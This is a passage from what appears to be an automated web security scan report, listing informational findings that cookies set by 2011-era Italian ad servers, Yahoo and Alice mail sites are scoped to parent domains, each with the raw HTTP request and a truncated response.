Set-Cookie: RMFL=011QH1NVUO088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.31. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930?_RM_EMPTY_ HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN|O01CUX; RMFL=011QH1NVUL088N

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 23:48:54 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVUN088N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

14.32. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: adv.ilsole24ore.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:53 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMID=adc1d6f34dbf3090; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
P3P: policyref="http://adv.ilsole24ore.it/w3c/p3p.xml", CP="NOI DEVa TAIa OUR BUS UNI"
Content-Length: 1552
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: application/x-javascript

document.write ('<!-- \n');
document.write ('Support: http://adv.ilsole24ore.it#OasDefault/BancaPopMilano_XGR_am_110502#87210#83881.html#d951c#1297330909#91#Hc#Top#www.ilsole24ore.it/07/sole5/shopping
...[SNIP]...

14.33. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930?http://www.webank.it/lndpage/promo321.html HTTP/1.1
Host: adv.ilsole24ore.it
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/799974/728x90_wetrade_290411.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN; RMFL=011QH1NVU3088N

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:45:36 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFD=011QH1NKO10CUN|O01CUX; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
Location: http://www.webank.it/lndpage/promo321.html
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 305

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.webank.it/lndpage/promo321.html">here</
...[SNIP]...

14.34. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adv.ilsole24ore.it
Path:   /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930 HTTP/1.1
Host: adv.ilsole24ore.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFL=011QH1NVU1088N; RMID=adc1d6f34dbf2c90; RMFD=011QH1NKO10CUN;

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:23:00 GMT
Server: Apache/1.3.37 (Unix) mod_cap/1.2.3 mod_oas/5.8
Set-Cookie: RMFL=011QH1NVU7188N; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.ilsole24ore.it
Location: http://www.stile-magazine.it
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 291

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://www.stile-magazine.it">here</A>.<P>
<HR>
<A
...[SNIP]...

14.35. http://answers.yahoo.com/question/index

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.yahoo.com
Path:   /question/index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /question/index HTTP/1.1
Host: answers.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:12 GMT
Set-Cookie: B=5sbapqt6rubmg&b=3&s=f4; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Status: 404 Not Found
Imagetoolbar:
Set-Cookie: answers=SmhGfTfoOQ0db.8ef0vD2MzHIRDUJi5bCY5ng3si3sBcAcCR4N72Pka1dVM2fcTrURXaSQYY2_mqK8uzpRHwf9wPbtuRYlbhorqJHtpY2GKqq.JsOSGpmveDCpUBh22NekdTb4.cmnPTfArTQUtT07zHPK_iVLSXlvnJbBt6ti1cTQIQlPFAI_bPyYeDaLWdmUHgXpNxWiIe46.buzxw7UQd5xq8H6dOqfL6ipn42XhIN1GeHTcHUzKQV.U_fRrPr55OCJ.J7Bxj2CERgjpSSffDzPPFlCBJqDJdNxsbpZKA_6AQnjW_woyyiObtdzgEKGzlwreqRQTbIxmyF_NzaHvwbf75KWnggrA48ra6cEeQaePU71NHfUw3d4hFiGzlsgQ7d9vY8aWxBVrogLo9OHQSLvBDpNxTJ4E8Pfsui6MJMPPZhZ_f7X6_Sy3GDbWnwEaO4aHqcCPApAa32_FMh7BKzsioUMzDf_u9cdhNDWdImio6wGJ9KDo-; expires=Wed, 02-May-2012 22:23:12 GMT; path=/; domain=.answers.yahoo.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 31141

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-us" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...

14.36. http://auth.rossoalice.alice.it/aap/serviceforwarder

Summary

Severity:   Information
Confidence:   Certain
Host:   http://auth.rossoalice.alice.it
Path:   /aap/serviceforwarder

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aap/serviceforwarder HTTP/1.1
Host: auth.rossoalice.alice.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 May 2011 22:23:33 GMT
Server: Apache
Location: http://maileservizi.alice.it/home/login.html
Set-Cookie: slat=1304375040; domain=.alice.it; path=/
Connection: close
Content-Type: text/html
Content-Length: 283

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://maileservizi.alice.it/home/
...[SNIP]...

14.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The application issued cookies that are scoped to a parent of the issuing domain; they appear in the Set-Cookie headers of the response below. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2492235&PluID=0&w=728&h=90&ord=2060797925&ucm=true HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jBofaIOs07Si00001; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C4=; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=24ad32c2-af7c-40e0-8d47-2a3f2f9676673HU080; expires=Sun, 31-Jul-2011 20:12:13 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 03 May 2011 00:12:13 GMT
Connection: close
Content-Length: 1824

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

14.38. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/tr/17671-124835-21707-7

Issue detail

The application issued cookies that are scoped to a parent of the issuing domain; they appear in the Set-Cookie headers of the response below. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm/tr/17671-124835-21707-7?mpt=1304392432100 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: svid=68257899343; expires=Fri, 2-May-2014 5:23:04 GMT; path=/; domain=.eyewonder.com;
Set-Cookie: mojo3=17671:21707; expires=Thu, 2-May-2013 5:23:04 GMT; path=/; domain=.eyewonder.com;
Content-Type: image/gif
Content-Length: 49
Date: Mon, 02 May 2011 22:16:38 GMT


14.39. http://del.icio.us/post

Summary

Severity:   Information
Confidence:   Certain
Host:   http://del.icio.us
Path:   /post

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /post HTTP/1.1
Host: del.icio.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 22:24:02 GMT
Set-Cookie: BX=269mihl6rubo2&b=3&s=pq; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.icio.us
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/post
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 162

The document has moved <A HREF="http://www.delicious.com/post">here</A>.<P>
<!-- fe09.web.del.ac4.yahoo.net uncompressed/chunked Mon May 2 22:24:02 UTC 2011 -->

14.40. http://go.techtarget.com//clicktrack-r/activity/activity.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://go.techtarget.com
Path:   //clicktrack-r/activity/activity.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET //clicktrack-r/activity/activity.gif?activityTypeId=16&t=2240031635&a=2011-05-02%2021:29:36&c=normal&r=178895&g=212087 HTTP/1.1
Host: go.techtarget.com
Proxy-Connection: keep-alive
Referer: http://searchcio-midmarket.techtarget.com/definition/expert-system
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783; tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; ugcCltHeight=; bn_u=UNASSIGNED

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
Location: http://media.techtarget.com/searchTechTarget/images/spacer.gif
Set-Cookie: bk=9bc3dd27-5b12-4c7d-86ae-0d19a67e63b7; domain=.techtarget.com; path=/; expires=Sun, 31-Jul-2011 21:29:49 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 100
Date: Mon, 02 May 2011 21:29:49 GMT

The URL has moved <a href="http://media.techtarget.com/searchTechTarget/images/spacer.gif">here</a>

14.41. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ieo.solution.weborama.fr
Path:   /fcgi-bin/adserv.fcgi

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM] HTTP/1.1
Host: ieo.solution.weborama.fr
Proxy-Connection: keep-alive
Referer: http://www.ilsole24ore.com/?refresh_ce
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 23:04:57 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM"
Set-Cookie: AFFICHE_W=aNYEiHwzol9n04;expires=Wed, 01 May 2013 23:04:57 GMT;domain=.weborama.fr;path=/
Location: http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&BOUNCE=OK&brnd=40572&clicktag=[URLTRACKING]&rnd=[RANDOM]
Content-Length: 340
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ieo.solution.weborama.fr/fcgi-bin/adserv
...[SNIP]...

14.42. http://it.yahoo.com/add

Summary

Severity:   Information
Confidence:   Certain
Host:   http://it.yahoo.com
Path:   /add

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /add HTTP/1.1
Host: it.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 02 May 2011 22:25:38 GMT
Set-Cookie: B=b85h77h6rubr2&b=3&s=u7; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Location: http://it.add.yahoo.com/
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Connection: close
Server: YTS/1.20.0

<html><body>This page has moved, please <a href="http://it.add.yahoo.com/">click here</a> to go to its new location.</body></html><!-- w95.fp.re1.yahoo.com uncompressed/chunked Mon May 2 15:25:38 PDT
...[SNIP]...

14.43. http://local.virgilio.it/scripts/jquery.cookie.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.virgilio.it
Path:   /scripts/jquery.cookie.js

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/jquery.cookie.js HTTP/1.1
Host: local.virgilio.it
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:13:50 GMT
Server: Apache
Set-Cookie: kp=173.193.214.243.1304374430919936; path=/; expires=Thu, 29-Apr-21 22:13:50 GMT; domain=.virgilio.it
Last-Modified: Tue, 19 Apr 2011 14:59:54 GMT
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 22:13:50 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 998

eval(function(p,a,c,k,e,r){e=function(c){return (c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36));};if(!"".replace(/^/,String)){while(c--){r[e(c)]=k[c]||e(c);}k=[function
...[SNIP]...

14.44. http://mail.alice.it/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: mail.alice.it
Proxy-Connection: keep-alive
Referer: http://burp/show/3
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: slat=1304375040

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:30:25 GMT
Server: Apache
Set-Cookie: kp=1304375425884687; path=/; expires=Thu, 29-Apr-21 22:30:25 GMT; domain=.alice.it
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 12834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Alice Mail: e-mail gratis e posta elettronica sicura</title>
<meta http-equi
...[SNIP]...

14.45. http://mail.alice.it/common/VIRGILIO/header2008/stili/header_alice.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /common/VIRGILIO/header2008/stili/header_alice.css

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/VIRGILIO/header2008/stili/header_alice.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:38 GMT
Server: Apache
Set-Cookie: kp=1304375378741245; path=/; expires=Thu, 29-Apr-21 22:29:38 GMT; domain=.alice.it
Last-Modified: Wed, 15 Dec 2010 14:42:25 GMT
ETag: "81a92-62f-f20fd640"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 1583

#header, #header .topH a.vlogo, #header .contenutiH h1 a strong, #header .contenutiH form, #header .contenutiH form a.submit, #header .contenutiH .telecom {background:url("/images/header/immagine.png"
...[SNIP]...

14.46. http://mail.alice.it/css/popup.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/popup.css

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/popup.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:37 GMT
Server: Apache
Set-Cookie: kp=1304375377467066; path=/; expires=Thu, 29-Apr-21 22:29:37 GMT; domain=.alice.it
Last-Modified: Tue, 14 Dec 2010 11:34:23 GMT
ETag: "262b96-1c32-33c2cdc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 7218

body {font-family:Arial, FreeSans, sans-serif; font-size: 11px; background:#eaeef1 url("/images/bg.gif") repeat-x 0 0; margin:0; padding:0}
body#snd {font-family:Tahoma; font-size: 11px; background:#F
...[SNIP]...

14.47. http://mail.alice.it/css/stili.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/stili.css

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/stili.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:37 GMT
Server: Apache
Set-Cookie: kp=1304375377261127; path=/; expires=Thu, 29-Apr-21 22:29:37 GMT; domain=.alice.it
Last-Modified: Fri, 01 Apr 2011 09:22:36 GMT
ETag: "262b90-9995-f3540f00"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/css
Content-Length: 39317

/*BODY*/
   @import url("/common/VIRGILIO/header2008/stili/header_alice.css");

    * {margin:0;padding:0;}
   /* NORMALE*/ body {/*margin:3px 0 5px 0;*/ background-color:#FFFFFF;/* url(../images/bg_1px_bod
...[SNIP]...

14.48. http://mail.alice.it/css/stili_overwrite.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.alice.it
Path:   /css/stili_overwrite.css

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain; it appears in the Set-Cookie header of the response below. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /css/stili_overwrite.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: mail.alice.it

Response

